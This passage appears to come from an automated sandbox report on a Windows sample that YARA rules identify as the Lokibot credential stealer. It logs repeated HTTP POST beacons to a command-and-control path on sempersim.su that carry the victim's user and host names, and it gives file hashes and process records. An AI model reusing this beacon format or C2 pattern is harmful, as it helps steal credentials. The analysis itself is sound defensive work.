                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:47.662164927 CEST8174OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:48.532793999 CEST8174INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:32 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    27192.168.2.349858104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:55.746968985 CEST8182OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:55.781109095 CEST8182OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:56.667985916 CEST8182INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:40 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    28192.168.2.349865104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:59.728405952 CEST15694OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:59.762680054 CEST15695OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:10:00.690473080 CEST15695INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:44 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    29192.168.2.349867104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:10:03.646769047 CEST15697OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:10:03.680988073 CEST15698OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:10:04.550873041 CEST15707INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:48 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.349746104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:32.826505899 CEST1134OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:32.862839937 CEST1134OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:33.658945084 CEST1135INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:17 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    30192.168.2.349879104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:10:05.859589100 CEST16770OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:10:05.894614935 CEST16772OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:10:06.706850052 CEST17112INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:50 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    31192.168.2.349892104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:10:09.603862047 CEST17133OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:10:09.637948036 CEST17134OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:10:10.533294916 CEST17134INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:53 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    32192.168.2.349895104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:10:14.615169048 CEST17148OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:10:14.650410891 CEST17148OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:10:15.552607059 CEST17149INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:58 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    33192.168.2.349896104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:10:16.412961960 CEST17150OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:10:16.447062016 CEST17150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:10:17.418004036 CEST17150INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:10:00 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.349749104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:34.891798973 CEST1139OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:34.926253080 CEST1140OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:35.758181095 CEST1140INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:19 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.349750104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:40.626646042 CEST1141OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:40.660305023 CEST1141OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:41.569597960 CEST1141INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:25 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    6192.168.2.349751104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:43.382677078 CEST1142OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:43.416619062 CEST1143OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:44.299705982 CEST1143INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:27 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    7192.168.2.349754104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:45.504365921 CEST1175OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:45.538566113 CEST1180OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:46.411556005 CEST1290INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:29 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    8192.168.2.349765104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:48.152004957 CEST1314OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:48.185455084 CEST1315OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:49.079457045 CEST1338INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:32 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    9192.168.2.349771104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:50.748194933 CEST1354OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:50.782381058 CEST1354OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:51.674694061 CEST1354INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:35 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:18:08:06
                                    Start date:23/06/2022
                                    Path:C:\Users\user\Desktop\hfyhigXccT.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\hfyhigXccT.exe"
                                    Imagebase:0xb80000
                                    File size:486912 bytes
                                    MD5 hash:F0DDD6F32E65868ACC9D38B35AF0E2C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Target ID:4
                                    Start time:18:08:19
                                    Start date:23/06/2022
                                    Path:C:\Users\user\Desktop\hfyhigXccT.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Desktop\hfyhigXccT.exe
                                    Imagebase:0x410000
                                    File size:486912 bytes
                                    MD5 hash:F0DDD6F32E65868ACC9D38B35AF0E2C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Target ID:5
                                    Start time:18:08:21
                                    Start date:23/06/2022
                                    Path:C:\Users\user\Desktop\hfyhigXccT.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\hfyhigXccT.exe
                                    Imagebase:0xc20000
                                    File size:486912 bytes
                                    MD5 hash:F0DDD6F32E65868ACC9D38B35AF0E2C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
